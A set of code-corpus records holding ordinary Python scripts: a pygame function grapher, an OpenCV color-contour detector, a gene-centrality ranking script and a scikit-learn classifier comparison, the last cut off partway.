self.populations[0].remove_individual(min(self.populations[0].individuals, key=(lambda x: x._cfs)))\n\n\nclass Population:\n    def __init__(self, genometype: Genome.__class__):\n        self.individuals = []\n        self.hall_of_fame = []\n        self.genometype = genometype\n\n    def generate_new(self, num):\n        for i in range(num):\n            genome = self.genometype.generate_random()\n            self.individuals.append(genome)\n\n    def remove_individual(self, el):\n        \"\"\"\n        Removes an individual by its index or by reference.\n\n        :param el: The index (or Genome) identifying which individual to remove\n        \"\"\"\n        if isinstance(el, int):\n            self.individuals.pop(el)\n        elif isinstance(el, Genome):\n            self.individuals.remove(el)\n        else:\n            raise ValueError(\"Value of the wrong type\")\n","sub_path":"evolutore.py","file_name":"evolutore.py","file_ext":"py","file_size_in_byte":9212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"561041295","text":"# -*- coding: utf-8 -*-\n# A program that just prints the current date and time\n\nimport datetime\n\nclass output_text :\n    # initialization\n    def __init__(self) :\n        print(\"start\")\n\n    # print the date/time\n    def output_date(self, mode = 0) :\n        if mode == 1 :\n            # \n            print(datetime.date.today())\n        elif mode == 2 :\n            print(datetime.datetime.today())\n        else :\n            print(\"none\")","sub_path":"flask-begins/form.py","file_name":"form.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"378661976","text":"#!/usr/bin/env python\n\nimport sys\n\ndef get_centrality(filename):\n    PG = []\n    BT = []\n    HB = []\n    for l in open(filename):\n        l = l.rstrip()\n        g, pg, inputd, outd, bt, hb, a = l.split(',')\n\n        PG.append( (g, pg) )\n        BT.append( (g, bt) )\n        HB.append( (g, hb) )\n\n    PG = sorted(PG, key = lambda x : x[1], reverse=True)\n    BT = sorted(BT, key = lambda x : x[1], reverse=True)\n    HB = sorted(HB, key = lambda x : 
x[1], reverse=True)\n\n return (PG, BT, HB)\n\ndef get_clusters(filename = 'genes-cluster.txt'):\n GENE_CLUSTER = {}\n\n for l in open(filename):\n l = l.rstrip()\n\n gene, cluster = l.split(',')\n\n GENE_CLUSTER[gene] = cluster\n\n return GENE_CLUSTER\n\nGENE_CLUSTER = get_clusters()\n\nN = int(sys.argv[2])\nCLUSTER_ID = sys.argv[3]\n\nPG, BT, HB = get_centrality(sys.argv[1])\n\nKEK = [('PG', PG), ('BT', BT), ('HB', HB)]\n\nfor (tipo, RANK) in KEK:\n ENTRADA2 = open('classify-entrada-{0}.txt'.format(tipo), 'w')\n\n A_LIST = []\n for gene, rank in PG:\n if GENE_CLUSTER[gene] == CLUSTER_ID:\n A_LIST.append(gene)\n\n A_LIST = A_LIST[:N]\n\n # you have to keep matlab order\n for l in open('genes-cluster.txt'):\n l = l.rstrip()\n\n n, c_id = l.split(',')\n\n try:\n #if GENE_CLUSTER[n] == CLUSTER_ID:\n if c_id == CLUSTER_ID:\n if n in A_LIST:\n ENTRADA2.write('1\\n')\n else:\n ENTRADA2.write('0\\n')\n else:\n ENTRADA2.write('2\\n')\n except:\n ENTRADA2.write('2\\n')\n continue\n\n ENTRADA2.close()\n","sub_path":"2gera-entrada-classificador.py","file_name":"2gera-entrada-classificador.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"347380868","text":"import math, sys\nimport pygame as pg\nfrom pygame import *\nfrom math import *\nfrom graphics import *\n\npg.init()\n\nfont = pg.font.SysFont('Verdana', 16)\nfont2 = pg.font.SysFont('Serif', 24)\nWHITE = (255,255,255)\nBLACK = (0,0,0)\nBLUE = (0,0,200)\nPINK = (200,0,200) \nLIGHT_BLUE = (100,250,240) \nDARK_PINK = (200,0,150)\nRED = (200,0,0)\n\nwidth,height = 500,500\nextraW = 400\nscreen = pg.display.set_mode((width + extraW, height))\npg.display.set_caption(\"Super Awesome Function Grapher :D\")\n\ncolW = 80\nrowH = 50\ncol1x = width+10\ncol2x = width+colW+20\ncol3x = width+(2*colW)+30\ncol4x = width+(3*colW)+40\nrow1y = height/2 + 90\nrow2y = height/2 + 145\n\nk = 25\nequation = []\neq = \"\"\nmoveX, moveY = 0,0\n\n\ndef createGrid(k, moveX, moveY):\n screen.set_clip(0,0,width+10,height)\n screen.fill(WHITE)\n \n #draw graph paper\n for i in range(width//k):\n gridX = k*i\n gridY = k*i\n pg.draw.line(screen, LIGHT_BLUE, (gridX,0), (gridX,height), 1)\n pg.draw.line(screen, LIGHT_BLUE, (0,gridY), (width,gridY), 1)\n \n #last line \n pg.draw.line(screen, LIGHT_BLUE, (width,0), (width,height), 2)\n \n #x and y axis\n midX = (width+moveX)/(2)\n midY = (height+moveY)/(2)\n pg.draw.line(screen, BLACK, (midX, 0), (midX, height), 3)\n pg.draw.line(screen, BLACK, (0, midY), (width, midY), 3)\n \n #clip reset to entire window\n screen.set_clip(None)\n\ndef button(txt,x,y,w,h):\n mouse = pg.mouse.get_pos()\n pg.draw.rect(screen, DARK_PINK,(x,y,w,h))\n if x+w > mouse[0] > x and y+h > mouse[1] > y:\n pg.draw.rect(screen, LIGHT_BLUE,(x,y,w,h))\n btnTxt = font2.render(txt, 1, BLACK)\n btnCenter = ( (x+(w/8)), (y+(h/4)) )\n screen.blit(btnTxt, btnCenter)\n\n\n\ndef createInstructions():\n screen.set_clip(width+10,0,width+extraW,height)\n screen.fill(WHITE)\n \n title = font2.render(\"Super Awesome Function Grapher :D\", 1, BLUE)\n screen.blit(title, (width + 10, 10))\n \n instruct = font.render(\"Enter your equation: \", 1, BLACK)\n screen.blit(instruct, (width + 10, 60))\n \n instruct = font.render(\"Press [ENTER] when done or [q] to restart.\", 1, BLACK)\n screen.blit(instruct, (width + 10, 90))\n \n instruct = font.render(\"Press [BACKSPACE] to clear.\", 1, BLACK)\n screen.blit(instruct, (width + 10, 120))\n \n instruct = font.render(\"s=sin(), c=cos(), 
t=tan(), r=sqrt(), a=abs()\", 1, BLACK)\n screen.blit(instruct, (width + 10, 180))\n \n instruct = font.render(\"l=log10(), n=log(), e=e, p=pi\", 1, BLACK)\n screen.blit(instruct, (width + 10, 210))\n \n screen.set_clip(None)\n \n\n\ndef graphEq(eq, k, moveX, moveY):\n createGrid(k, moveX, moveY)\n screen.set_clip(0,0,width,height)\n \n if moveX < 0: \n #graphing of the equation\n for i in range(width):\n try: \n screen.set_clip(0,0,width,height)\n x = -((width+moveX)/2 - i)/float(k)\n y = eval(eq)\n pos1 = ((width+moveX)/2 + x * k, (height+moveY)/2 - y * k)\n \n nx = x = -((width+moveX)/2 - (i+1)) / float(k)\n ny = eval(eq)\n pos2 = ((width+moveX)/2 + nx * k, (height+moveY)/2 - ny * k)\n \n if (abs(y - ny) > 30):\n pg.draw.line(screen, RED, pos1, pos2, 3)\n else: \n pg.draw.line(screen, BLUE, pos1, pos2, 3)\n \n pg.display.update \n except:\n pass\n \n else: \n #graphing of the equation\n for i in range(width+moveX):\n try: \n screen.set_clip(0,0,width,height)\n x = ((width+moveX)/2 - i)/float(k)\n y = eval(eq)\n pos1 = ((width+moveX)/2 + x * k, (height+moveY)/2 - y * k)\n \n nx = x = ((width+moveX)/2 - (i+1)) / float(k)\n ny = eval(eq)\n pos2 = ((width+moveX)/2 + nx * k, (height+moveY)/2 - ny * k)\n \n if (abs(y - ny) > 30):\n pg.draw.line(screen, RED, pos1, pos2, 3)\n else: \n pg.draw.line(screen, BLUE, pos1, pos2, 3)\n \n pg.display.update \n except:\n pass\n\n\n\ndef main(equation, eq, k):\n \n done = False \n active = True\n moveX, moveY = 0,0\n \n createGrid(k, moveX, moveY)\n createInstructions()\n \n \n \n while active:\n #update the screen\n screen.set_clip(width+10, height-30, width+extraW, height)\n screen.fill(WHITE)\n screen.set_clip(None)\n \n #join equation array without commas\n eq = \" \".join(equation)\n eq = str.replace(eq,\" \", \"\")\n \n #render and blit equation\n eqShow = font.render(\"Function: y = \" + eq, 1, BLUE)\n screen.blit(eqShow, (width+10, height-30))\n \n mouse = pg.mouse.get_pos()\n click = pg.mouse.get_pressed()\n \n button(\"In\", col1x, row1y, colW, rowH)\n button(\"Out\", col1x, row2y, colW, rowH)\n button(\"Up\", col2x, row1y, colW, rowH)\n button(\"Down\", col2x, row2y, colW, rowH)\n button(\"Right\", col3x, row1y, colW, rowH)\n button(\"Left\", col3x, row2y, colW, rowH)\n button(\"Origin\", col4x, row1y, colW, 2*rowH+5)\n \n screen.set_clip(0,0,width,height)\n \n #Zoom in\n if col1x+colW > mouse[0] > col1x and row1y+rowH > mouse[1] > row1y:\n if click[0] == 1:\n if k < 50:\n k = k + 1\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n\n #Zoom out\n if col1x+colW > mouse[0] > col1x and row2y+rowH > mouse[1] > row2y:\n if click[0] == 1:\n if k > 14:\n k = k - 1\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY) \n \n #Move up\n if col2x+colW > mouse[0] > col2x and row1y+rowH > mouse[1] > row1y:\n if click[0] == 1:\n moveY += 5\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n \n #Move down\n if col2x+colW > mouse[0] > col2x and row2y+rowH > mouse[1] > row2y:\n if click[0] == 1:\n moveY -= 5\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n \n #Move right\n if col3x+colW > mouse[0] > col3x and row1y+rowH > mouse[1] > row1y:\n if click[0] == 1:\n moveX -= 5\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n \n #Move left\n if col3x+colW > mouse[0] > col3x and row2y+rowH > mouse[1] > row2y:\n if click[0] == 1:\n moveX += 5\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n \n #Origin\n if col4x+colW > mouse[0] > col4x and row2y+rowH > mouse[1] > row1y:\n if click[0] == 1:\n moveX 
= 0\n moveY = 0\n k = 25\n createGrid(k, moveX, moveY)\n graphEq(eq, k, moveX, moveY)\n \n pg.display.update()\n\n #keyboard and mouse commands\n for event in pg.event.get(): \n \n if event.type == pg.QUIT:\n active = False\n done = True \n \n elif event.type == pg.KEYDOWN:\n \n #math operators\n if event.unicode == u'*':\n equation.append(\"*\")\n elif event.unicode == u'/':\n equation.append(\"/\")\n elif event.unicode == u'-':\n equation.append(\"-\")\n elif event.unicode == u'+':\n equation.append(\"+\")\n elif event.unicode == u'.':\n equation.append(\".\")\n elif event.unicode == u')':\n equation.append(\")\")\n elif event.unicode == u'(':\n equation.append(\"(\")\n \n #numbers typed in for equation and x variable\n if event.unicode == u'1':\n equation.append(\"1\")\n elif event.unicode == u'2':\n equation.append(\"2\")\n elif event.unicode == '3':\n equation.append(\"3\")\n elif event.unicode == u'4':\n equation.append(\"4\")\n elif event.unicode == u'5':\n equation.append(\"5\")\n elif event.unicode == u'6':\n equation.append(\"6\")\n elif event.unicode == u'7':\n equation.append(\"7\")\n elif event.unicode == u'8':\n equation.append(\"8\")\n elif event.unicode == u'9':\n equation.append(\"9\")\n elif event.unicode == u'0':\n equation.append(\"0\")\n \n #math functions\n elif event.unicode == u's':\n equation.append(\"sin(\")\n elif event.unicode == u'c':\n equation.append(\"cos(\")\n elif event.unicode == u't':\n equation.append(\"tan(\")\n elif event.unicode == u'r':\n equation.append(\"sqrt(\")\n elif event.unicode == u'a':\n equation.append(\"abs(\")\n elif event.unicode == u'l':\n equation.append(\"log10(\")\n elif event.unicode == u'n':\n equation.append(\"log(\")\n elif event.unicode == u'e':\n equation.append(\"e\")\n elif event.unicode == u'p':\n equation.append(\"pi\")\n \n \n elif event.unicode == u'x':\n equation.append(\"x\") \n elif event.key == K_RETURN:\n graphEq(eq, k, moveX, moveY) \n elif event.key == K_BACKSPACE:\n equation = []\n elif event.unicode == u'q':\n main([], \"\", 25)\n \n \n \n if done:\n pg.QUIT\n sys.exit()\n\n\n\nmain(equation, eq, k)\n ","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":10650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"3947136","text":"# first we need is the webcam\nimport cv2, numpy as np\n\n# change the value of argument by 0 for default webcam, or by webcam ID\ncap = cv2.VideoCapture(0)\n# ID number three for width\ncap.set(3, 640)\n# ID number four for height\ncap.set(4, 480)\n# ID number ten for brightness\ncap.set(10, 100)\n\nmyColors = [[25,130,215,179,255,255]]\n\n# DEFINE COLOR\ndef findColor(img, myColors):\n # 1. convert into HSV space\n imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n # 2. 
create a mask to filter out our images\n    for color in myColors:\n        lower = np.array( color[0:3] )\n        upper = np.array( color[3:6] )\n        mask = cv2.inRange(imgHSV, lower, upper)\n\n        getContour(mask)\n        # cv2.imshow(str(color[0]), mask)\n\ndef getContour(img):\n    contours, hierarchy = cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n    # for each contour, we are going to find the area first\n    for cnt in contours:\n        area = cv2.contourArea(cnt)\n        print(area)\n        # draw the contour to 'imgResult' if area is greater than 500px\n        # .drawContours() : image, contours, contourIndex, color, thickness\n        if area > 500:\n            cv2.drawContours(imgResult, cnt, -1, (255, 0, 0), 3)\n            # length of each contour arc by arc\n            peri = cv2.arcLength(cnt, True)\n            # get the corner points\n            approx = cv2.approxPolyDP(cnt, 0.02*peri, True)\n            # create object corner / bounding boxes\n            x, y, w, h = cv2.boundingRect(approx)\n\n\nwhile True:\n    success, img = cap.read()\n    imgResult = img.copy()\n    findColor(img, myColors)\n    cv2.imshow(\"result\", imgResult) # show the frame with the drawn contours\n    if cv2.waitKey(1) & 0xFF == ord('q'):\n        break","sub_path":"jajal/opencv.py","file_name":"opencv.py","file_ext":"py","file_size_in_byte":1697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
{"seq_id":"61630172","text":"import os\nimport numpy as np\nimport pandas as pd\nimport sklearn as sk\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import accuracy_score, confusion_matrix, classification_report\nfrom sklearn import metrics\nfrom sklearn.metrics import precision_recall_curve\nfrom sklearn.metrics import average_precision_score\nfrom sklearn.metrics import plot_precision_recall_curve\nfrom sklearn.metrics import classification_report\n\n# import warnings filter\nfrom warnings import simplefilter\n\n# ignore all future warnings\nsimplefilter(action='ignore', category=FutureWarning)\n\n\n#################################\n# load data and preprocess it #\n#################################\n\n# use \"data_final\"\nsource = \"data_final\"\n# if ensemble is not used, upsample_input = 3 should be set for non-tree models -> higher model performance\nupsample_input = 3\n#upsample_input = 1\ndata = pd.read_csv(source+'.csv')\n\n\nprint('This Script is from', source)\nprint('it is upsampled times:', upsample_input)\n\n\ndata_numerical = pd.get_dummies(data, drop_first=True)\ndata_numerical = data_numerical.drop('y_yes', axis=1)\n\n# creating X and Y categories\nX_ori = data_numerical\nY = data['y']\n\n# Normalize the input variables\nX = (X_ori - X_ori.min()) / (X_ori.max() - X_ori.min())\n#print(X.head(6)) # testing\n\nfrom sklearn.model_selection import train_test_split, cross_val_score\n\n# raised to train_size of 0.8\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n\n# upsampling not used in the current approach\n# (implement for non-ensemble approach with 3 differently transformed datasets for non-trees, trees and LightGBM)\n# UPSAMPLING:\nfrom sklearn.utils import resample\ntrain_data = X_train.copy()\ntrain_data[\"y\"] = Y_train\ntrain_data_minority = train_data.loc[train_data[\"y\"] == \"yes\"]\ntrain_data_majority = train_data.loc[train_data[\"y\"] == \"no\"]\n# for checking class sizes:\nprint(\"majority: {}, minority: {}\".format(len(train_data_majority), len(train_data_minority)))\n# change parameter 'n_samples' to change upsampled data set 
size\ntrain_data_minority_upsampled = resample(train_data_minority,\n                                         replace=True,\n                                         n_samples=len(train_data_minority)*upsample_input,\n                                         random_state=0)\ntrain_data_upsampled = pd.concat([train_data_minority_upsampled, train_data_majority])\nX_train = train_data_upsampled.copy().iloc[:, :-1]\nY_train = train_data_upsampled[\"y\"]\nprint(\"upsampled data set class counts: \", Y_train.value_counts())\n\n# add the specific hyper-parameters that lead to the highest result to the report df\nreport = pd.DataFrame(columns=['Model', \"Best Params\", 'Acc. Train', 'Acc. Test', 'F1-Score Test', 'AUC', 'precision', 'recall'])\n\n\n# ------------------------------------ #\n# used for custom ensemble, DEPRECATED #\n# ------------------------------------ #\n# y_test_global = Y_test\n# y_train_global = Y_train\n# ensemble_y_train_list = []\n# ensemble_y_pred_list = []\n#\n# X_train_index = X_train.index\n# Y_train_index = Y_train.index\n# X_test_index = X_test.index\n# Y_test_index = Y_test.index\n#\n# print(X_train)\n# print(Y_train)\n# print(X_test)\n# print(Y_test)\n\n#################\n# Functions #\n#################\n\n\n# function for creating a plot\ndef create_gridsearch_plot(model_gs, param, param_label, title):\n    fig, ax1 = plt.subplots()\n    color = 'tab:blue'\n    ax1.set_xlabel(param_label)\n    ax1.set_ylabel('Mean Accuracy', color=color)\n    ax1.plot(model_gs.param_grid[param], model_gs.cv_results_[\"mean_test_score\"], color=color)\n    ax1.tick_params(axis='y', labelcolor=color)\n\n    ax2 = ax1.twinx()  # instantiate a second axes that shares the same x-axis\n    color = 'tab:red'\n    ax2.set_ylabel('Standard Deviation', color=color)  # we already handled the x-label with ax1\n    ax2.plot(model_gs.param_grid[param], model_gs.cv_results_[\"std_test_score\"], color=color)\n    ax2.tick_params(axis='y', labelcolor=color)\n    fig.tight_layout()  # otherwise the right y-label is slightly clipped\n    plt.title('Comparison of Accuracies and Standard Deviation ({})'.format(title))\n    plt.xticks(model_gs.param_grid[param])\n    plt.show()\n\n\n# function to calculate cmtr, acctr, cmte, accte\ndef calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred):\n    cmtr = confusion_matrix(Y_train, Y_train_pred)\n    acctr = accuracy_score(Y_train, Y_train_pred)\n    cmte = confusion_matrix(Y_test, Y_test_pred)\n    accte = accuracy_score(Y_test, Y_test_pred)\n    return {\"cmtr\": cmtr, \"acctr\": acctr, \"cmte\": cmte, \"accte\": accte}\n\n\n# Visualize Confusion Matrix\nfrom sklearn.metrics import confusion_matrix, plot_confusion_matrix\ndef confusion_matrix_plotter(model, X_test, Y_test):\n    plot_confusion_matrix(model, X_test, Y_test, labels=['no', 'yes'],\n                          cmap=plt.cm.Blues, values_format='d')\n    plt.show()\n\n\n# function to calculate precision and recall metrics\ndef calculate_precision_recall(Y_test, Y_test_pred):\n    Y_test_numb = pd.get_dummies(Y_test, drop_first=True)\n    Y_test_pred_numb = pd.get_dummies(Y_test_pred, drop_first=True)\n    precision = round(metrics.precision_score(Y_test_numb, Y_test_pred_numb), 4)\n    recall = round(metrics.recall_score(Y_test_numb, Y_test_pred_numb), 4)\n    return {\"precision\": precision, \"recall\": recall}\n\n\n# calculate f1 score\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.metrics import f1_score\n\n# function to calculate f1 score\ndef calculate_f1_score(Y_test, Y_test_pred):\n    lb_churn = LabelEncoder()\n    Y_test_code = lb_churn.fit_transform(Y_test)\n    Y_test_pred_code = lb_churn.fit_transform(Y_test_pred)\n    f1te = f1_score(Y_test_code, Y_test_pred_code)\n    print(f1te)\n    return f1te\n\n\n# 
calculate ROC and AUC and plot the curve\nfrom sklearn.metrics import roc_curve\nfrom sklearn.metrics import auc\n\n# function to calculate ROC and AUC and plot the curve\ndef calculate_roc_auc(model, X_test, Y_test):\n    Y_probs = model.predict_proba(X_test)\n    #print(Y_probs[0:6, :]) # testing\n    Y_test_probs = np.array(np.where(Y_test == 'yes', 1, 0))\n    #print(Y_test_probs[0:6]) # testing\n    fpr, tpr, threshold = roc_curve(Y_test_probs, Y_probs[:, 1])\n    #print(fpr, tpr, threshold) # testing\n    roc_auc = auc(fpr, tpr)\n    #print(roc_auc) # testing\n    # Precision-recall-curve\n    Y_test_probs = np.array(np.where(Y_test == 'yes', 1, 0))\n    Y_test_pred_probs = np.array(np.where(Y_test_pred == 'yes', 1, 0)) # note: Y_test_pred is read from the enclosing module scope\n    average_precision = average_precision_score(Y_test_probs, Y_test_pred_probs)\n    disp = plot_precision_recall_curve(model, X_test, Y_test)\n    disp.ax_.set_title('2-class Precision-Recall curve: '\n                       'AP={0:0.2f}'.format(average_precision))\n    plt.show()\n    return {\"roc_auc\": roc_auc, \"fpr\": fpr, \"tpr\": tpr}\n\n\n# plot model metrics fpr, tpr, roc_auc\nimport matplotlib.pyplot as plt\n\n# function to plot model metrics fpr, tpr, roc_auc\ndef plot_model_metrics(metrics_dict, title):\n    plt.plot(metrics_dict[\"fpr\"], metrics_dict[\"tpr\"], 'b', label='AUC = %0.2f' % metrics_dict[\"roc_auc\"])\n    plt.legend(loc='lower right')\n    plt.plot([0, 1], [0, 1], 'r--')\n    plt.xlim([0, 1])\n    plt.ylim([0, 1])\n    plt.ylabel('True Positive Rate')\n    plt.xlabel('False Positive Rate')\n    plt.title(title)\n    plt.show()\n\n\n# FOR TREES only\n# show feature importance\ndef plot_feature_importance(model, title):\n    list(zip(X, model.feature_importances_))\n    index = np.arange(len(model.feature_importances_))\n    bar_width = 1.0\n    plt.bar(index, model.feature_importances_, bar_width)\n    plt.xticks(index, list(X), rotation=90)  # labels get centered\n    plt.title(title)\n    plt.show()\n\n\n\nfrom tabulate import tabulate\n# formerly used tabulate for plotting; currently prints the grid search results instead\n# function to print information about the two param variations and their outcomes\ndef create_tabulate_plot(model_gs, param_1, param_2, param_label_1, param_label_2, title):\n    print(pd.DataFrame({param_1: model_gs.cv_results_[\"param_{}\".format(param_1)], param_2: model_gs.cv_results_[\"param_{}\".format(param_2)], \"mean_test_score\": model_gs.cv_results_[\"mean_test_score\"], \"std_test_score\": model_gs.cv_results_[\"std_test_score\"]}))\n    print(\"Best accuracy is: {}\".format(np.max(model_gs.cv_results_[\"mean_test_score\"])))\n    maxi = model_gs.best_params_\n    print(\"Best params are: {}\".format(maxi))\n\n\n\n#####################\n# START OF MODELS #\n#####################\n\n\n################\n# KNN #\n################\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import cross_val_score\n\n# new GridSearchCV implementation\n# attention: the parameter 'n_jobs=-1' means all CPU cores will be used. 
This may result in an overflow of the RAM\nmodel_gs_param_grid = {\"n_neighbors\": [4]}\n#model_gs_param_grid = {\"n_neighbors\": [6]}\nmodel_gs = sk.model_selection.GridSearchCV(estimator=KNeighborsClassifier(), param_grid=model_gs_param_grid,\n scoring='accuracy', cv=10, n_jobs=-1)\nmodel_gs.fit(X_train, Y_train)\n\n\n# plot gridsearch\ncreate_gridsearch_plot(model_gs, \"n_neighbors\", \"Number of Neighbors\", \"k-NN\")\n\n\n# implement best model:\nknnmodel = model_gs.best_estimator_\nknnmodel.fit(X_train, Y_train)\nY_train_pred = knnmodel.predict(X_train)\nY_test_pred = knnmodel.predict(X_test)\n\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# plot confusion matrix\nconfusion_matrix_plotter(knnmodel, X_test, Y_test)\n\n\n# plot classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate metrics roc_auc, fpr, tpr\nroc_auc_results = calculate_roc_auc(knnmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\n\n\n# plot model metrics\nplot_model_metrics(metrics_dict, 'ROC Curve of k-NN')\n\n\n# add metrics to the report:\nreport.loc[len(report)] = ['k-NN', model_gs.best_params_, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n# testing:\nprint(report)\n\nresults = pd.DataFrame(model_gs.cv_results_)\nresults.to_csv('Testing/'+source+'_KNN_report.csv', index = False)\n\n\n\n\n###############\n# Naive Bayes #\n###############\n\nfrom sklearn.naive_bayes import GaussianNB\n\n\n# no grid search applied\nnbmodel = GaussianNB()\nnbmodel.fit(X_train, Y_train)\nY_train_pred = nbmodel.predict(X_train)\nY_test_pred = nbmodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# plot confusion matrix\nconfusion_matrix_plotter(nbmodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(nbmodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\n\n\n# plot the metrics\nplot_model_metrics(metrics_dict, 'ROC Curve of GaussianNB')\n\n\n# add metrics to the report:\nreport.loc[len(report)] = ['Naive Bayes', None, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\n\n\n#########################\n# Discriminant Analysis #\n#########################\n\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\n# no grid search applied\ndismodel = LinearDiscriminantAnalysis()\ndismodel.fit(X_train, Y_train)\nY_train_pred = 
dismodel.predict(X_train)\nY_test_pred = dismodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(dismodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(dismodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Linear Discriminant Analysis')\n\n\n# add metrics to the report\nreport.loc[len(report)] = ['Linear Discriminant Analysis', None, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\n\n\n\n#####################################\n#  Quadratic Discriminant Analysis  #\n#####################################\n\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\n\n\n# no grid search applied\nqdismodel = QuadraticDiscriminantAnalysis()\nqdismodel.fit(X_train, Y_train)\nY_train_pred = qdismodel.predict(X_train)\nY_test_pred = qdismodel.predict(X_test)\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(qdismodel, X_test, Y_test)\n\n\n# print classification report\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, Y_test_pred))\n\n\n# calculate f1 score\nmetrics_dict[\"f1te\"] = calculate_f1_score(Y_test, Y_test_pred)\n\n\n# calculate ROC and AUC and plot the curve\nroc_auc_results = calculate_roc_auc(qdismodel, X_test, Y_test)\nmetrics_dict[\"roc_auc\"] = roc_auc_results[\"roc_auc\"]\nmetrics_dict[\"fpr\"] = roc_auc_results[\"fpr\"]\nmetrics_dict[\"tpr\"] = roc_auc_results[\"tpr\"]\nplot_model_metrics(metrics_dict, 'ROC Curve of Quadratic Discriminant Analysis')\n\n\n# add metrics to the report\nreport.loc[len(report)] = ['Quadratic Discriminant Analysis', None, metrics_dict[\"acctr\"], metrics_dict[\"accte\"], metrics_dict[\"f1te\"], metrics_dict[\"roc_auc\"], metrics_dict[\"precision\"], metrics_dict[\"recall\"]]\n\n\n# testing\nprint(report)\n\n\n\n#######################\n# Logistic Regression #\n#######################\n\nfrom sklearn.linear_model import LogisticRegression\n\n\n# no grid search applied\nlrmodel = LogisticRegression(class_weight=\"balanced\", random_state=0)\nlrmodel.fit(X_train, Y_train)\nY_train_pred = lrmodel.predict(X_train)\nY_test_pred = lrmodel.predict(X_test)\n\n\n# calculate cmtr, acctr, cmte, accte\nmetrics_dict = calculate_metrics(Y_train, Y_test, Y_train_pred, Y_test_pred)\n\n\n# Visualize Confusion Matrix\nconfusion_matrix_plotter(lrmodel, X_test, Y_test)\n\n\n# print classification report:\nprint('Classification Report \\n', classification_report(Y_test, Y_test_pred))\n\n\n# calculate precision & recall metrics\nmetrics_dict.update(calculate_precision_recall(Y_test, 
